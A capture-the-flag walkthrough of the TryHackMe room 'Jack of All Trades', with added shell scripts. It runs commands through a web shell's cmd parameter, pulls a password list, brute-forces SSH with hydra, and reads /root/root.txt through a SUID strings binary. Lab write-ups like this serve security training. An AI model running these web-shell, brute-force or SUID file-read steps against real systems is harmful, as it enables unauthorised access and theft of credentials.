TRYHACKME JACK OF ALL TRADES WRITEUP




After deploying the machine, the first step is an Nmap scan of the target IP to find the open ports and the services behind them. A version scan (-sV) is what matters here, because the banner tells you what is really listening rather than what the port number suggests.


The scan shows ports 22 and 80 open, but with the services swapped: HTTP is served on port 22 and SSH on port 80.

Pasting the IP address into the browser fails with a connection-reset error, because Firefox refuses to talk HTTP on port 22 (it is on the browser's list of banned ports). To get around this, Firefox has to be reconfigured.



Open about:config, search for network.security.ports.banned.override, and if the preference does not exist (it did not for me), right-click, choose New > String, give it that name, and set its value to 22 (a comma-separated list is accepted if several ports need unbanning). After that the page at http://[IP]:22 loads. Command-line tools such as curl and wget have no such restriction, so curl http://[IP]:22/ works without any change.


Looking at the page source, there is a base64 string and the comment "I can get back recovery.php". Decoding the string with CyberChef gives what looks like a password.

Next I went to the recovery.php page found in the source, which asks for a username and password. Trying jack as the username with the password from CyberChef did not work, so I checked the source of the recovery page too. There is another encoded string in a comment; decoding it the same way in CyberChef gives a bit.ly link.
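The comment-decoding step above, as an added shell example (this is not code from the original writeup). It pulls every HTML comment out of a saved copy of a page and base64-decodes any token that looks like base64 and decodes to printable text, which is the check done by hand with CyberChef. The sample page and its base64 comment are constructed for the demo; the real strings on the box are different.

```shell
#!/bin/sh
# Added example, not the original author's code. Decodes base64 hidden in
# the HTML comments of a saved page. The sample page below is constructed
# for the demo; the real strings on the box are different.

# Write a constructed sample page to $1.
make_sample_page() {
  cat > "$1" <<'EOF'
<html><body>
<h1>Jack of All Trades</h1>
<!-- Note to self: I can get back recovery.php -->
<!-- dGhpcyBpcyBhIGNvbnN0cnVjdGVkIHNhbXBsZQ== -->
<img src="stego.jpg"><img src="jackinthebox.jpg">
</body></html>
EOF
}

# Print the body of every single-line HTML comment in $1, one per line.
html_comments() {
  grep -o '<!--[^>]*-->' "$1" | sed 's/^<!--//; s/-->$//'
}

# Read text on stdin; print the decoding of every token that looks like
# base64 and decodes to printable text. Ordinary words such as "Note" are
# valid base64 too, so the minimum length and the printability check matter.
decode_b64_tokens() {
  set -f   # no globbing while splitting the input into tokens
  for tok in $(cat); do
    printf '%s' "$tok" | grep -Eq '^[A-Za-z0-9+/]{8,}={0,2}$' || continue
    [ $(( ${#tok} % 4 )) -eq 0 ] || continue
    decoded=$(printf '%s' "$tok" | base64 -d 2>/dev/null) || continue
    printf '%s' "$decoded" | LC_ALL=C grep -q '[^[:print:]]' && continue
    printf '%s\n' "$decoded"
  done
  set +f
  return 0
}

# Demo run on the constructed page. On the box, save the page first, e.g.
# curl -s http://[IP]:22/ > index.html, then: html_comments index.html | decode_b64_tokens
demo=$(mktemp)
make_sample_page "$demo"
html_comments "$demo" | decode_b64_tokens
rm -f "$demo"
```

Run it with no arguments to see the constructed comment decoded; point html_comments at a page saved from the target to repeat the step from the writeup. Multi-line comments and base64 wrapped over several lines are not handled, which is fine for a quick CTF check but worth knowing.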



The bit.ly link redirects to the Wikipedia page on Stegosauria. After a lot of searching through the page's edit history and web archive copies I could not find anything useful there; the name itself is the nudge, it points at steganography.


So I went back to the recovery page and re-read the decoded text from its source. It says the credentials are on the home page. I checked the cookies the site sets, but there was nothing there. Then I noticed the home page also embeds two images, so I downloaded both.

jackinthebox.jpg

stego.jpg



and tried the basic steganography checks on them: strings, exiftool, binwalk. Nothing. Next I ran steghide (steghide extract -sf stego.jpg), which asks for a passphrase; with the password from the main page it told me I was on the right path but with the wrong image. The same against jackinthebox.jpg only reported a wrong passphrase. So I went back to the home page source and found a third image, index.jpeg.


index.jpeg

steghide with the same passphrase on index.jpeg extracts the login credentials for jack. Back on the recovery page, those credentials work.


After logging in, the recovery page shows the statement "GET me a cmd". That is a prompt to pass a command in a GET parameter named cmd, so requesting recovery.php?cmd=ls worked 😉 and listed the files in the current directory. In other words, the page is a web shell: whatever is in cmd runs on the server.



I expected to find the user flag in jack's home directory, but instead there is a file called jack_password_list. Reading it (cat through the same cmd parameter) gives a list of candidate passwords for jack.



That leaves only SSH, which on this box is on port 80. The obvious move is to brute-force SSH for user jack with the password list just obtained (pointing the tool at port 80, not 22), and it works: one of the entries is jack's password.
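The two steps above (driving the cmd parameter, then spraying the password list at SSH) as one added shell example. This is not the original author's code. It URL-encodes each command so spaces, slashes and semicolons survive the GET parameter, fetches the list through the web shell, strips carriage returns and duplicates from it, and hands it to hydra against SSH on port 80. The target address, the AUTH_OPTS variable (whatever curl needs to stay logged in to recovery.php, which the writeup does not describe) and the path /home/jack/jack_password_list are assumptions.

```shell
#!/bin/sh
# Added example, not the original author's code. Drives the "GET me a cmd"
# parameter on recovery.php with URL-encoded commands, pulls the password
# list through it, cleans the list, and sprays it at SSH on port 80.
# TARGET, AUTH_OPTS and the list path are placeholders/assumptions.

TARGET=${TARGET:-10.10.10.10}   # placeholder, set to the box's IP
HTTP_PORT=${HTTP_PORT:-22}      # HTTP answers on 22 on this box
SSH_PORT=${SSH_PORT:-80}        # SSH answers on 80 on this box
# Options that keep curl logged in to recovery.php (e.g. "-b cookies.txt").
# Assumed: the writeup does not say how the login session is kept.
AUTH_OPTS=${AUTH_OPTS:-}

# Percent-encode $1 so spaces, slashes, quotes and ';' survive a GET parameter.
urlencode() {
  s=$1 out=''
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}; s=${s#?}
    case $c in
      [A-Za-z0-9._~-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s' "$out"
}

# Run one command through the GET parameter and print what the page returns.
web_cmd() {
  curl -s $AUTH_OPTS "http://$TARGET:$HTTP_PORT/recovery.php?cmd=$(urlencode "$1")"
}

# Drop CR (the list arrives over HTTP), blank lines and duplicates, keep order.
clean_wordlist() {
  tr -d '\r' < "$1" | grep -v '^[[:space:]]*$' | awk '!seen[$0]++'
}

# Spray the cleaned list at user jack over SSH on port 80; -f stops at the
# first valid password, -t 4 keeps the number of parallel connections modest.
ssh_spray() {
  hydra -l jack -P "$1" -s "$SSH_PORT" -t 4 -f "ssh://$TARGET"
}

# Full run against the box (network steps are left as comments so the file
# can be sourced and its helpers tested offline):
#   web_cmd 'ls -la /home/jack'
#   web_cmd 'cat /home/jack/jack_password_list' > raw_list.txt   # path assumed
#   clean_wordlist raw_list.txt > jack_list.txt
#   ssh_spray jack_list.txt

# Offline demo of the encoding step.
urlencode 'ls -la /home/jack'; echo
```

The encoding matters more than it looks: a raw `cat /home/jack/jack_password_list` in the URL usually still works because browsers fix up spaces, but anything with `;`, `&`, `?` or `#` in it gets cut or misparsed by the server unless it is percent-encoded. The cleaning step exists because a list copied out of an HTML response tends to pick up CRLF line endings and blank lines, and hydra will happily try "password\r" as a password.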


I logged in over SSH and found a file user.jpg. My first attempt was to base64-encode the image in the shell and decode it locally, but that did not work out, so I copied it with scp instead (note the uppercase -P, scp's port flag differs from ssh's -p): scp -P 80 jack@[I.P.]:user.jpg /home
Viewing the downloaded image gives the user flag.


Next, sudo -l to see what jack can run as root: nothing, jack has no sudo rights. When sudo -l gives nothing, the next thing I always check is SUID binaries, since each of them runs with the privileges of its owner (root, if root owns it) no matter who executes it:

find / -type f -user root -perm -4000 -exec ls -l {} \; 2>/dev/null

There are plenty of SUID binaries, but the one that matters is /usr/bin/strings. Because it is SUID root, strings opens files with root's privileges, so strings /root/root.txt prints the contents of the root flag (the room's hint points the same way). Root flag done 😎.
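The SUID hunt above, as an added shell example (not the original author's code): it lists SUID files under a directory and flags the ones whose basename is a program that can dump a file's contents while keeping the owner's privileges, which is exactly why /usr/bin/strings worked here. The reader list is a subset of the GTFOBins "SUID, file read" entries I am sure of, not a complete list; anything else in the find output still deserves a look.

```shell
#!/bin/sh
# Added example, not the original author's code. Enumerates SUID binaries
# and flags those that can read any file as their owner (the strings trick).
# The reader list is a subset of GTFOBins' "SUID -> file read" entries that
# I am sure of; it is not exhaustive.

# List SUID files under $1; with a second argument, only those owned by it.
# On the box: find_suid / root. Unreadable directories are silenced.
find_suid() {
  if [ -n "$2" ]; then
    find "$1" -xdev -type f -perm -4000 -user "$2" 2>/dev/null
  else
    find "$1" -xdev -type f -perm -4000 2>/dev/null
  fi
}

# Read paths on stdin; print those whose basename is a known file reader.
# Any of these, when SUID root, prints a root-only file: e.g. strings /root/root.txt
suid_candidates() {
  readers=' strings base64 xxd head tail cut cat less more '
  while IFS= read -r p; do
    n=${p##*/}
    case $readers in
      *" $n "*) printf '%s\n' "$p" ;;
    esac
  done
}

# Demo: scan /usr on this machine (set SUID_ROOT=/ on the box) for root-owned
# SUID file readers.
find_suid "${SUID_ROOT:-/usr}" root | suid_candidates
```

The -user root filter is what makes a hit interesting: a SUID binary owned by an unprivileged user only gets you that user. The -xdev flag keeps find off /proc, network mounts and the like, which is where most of the noise (and the slowness) of a bare find / comes from.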



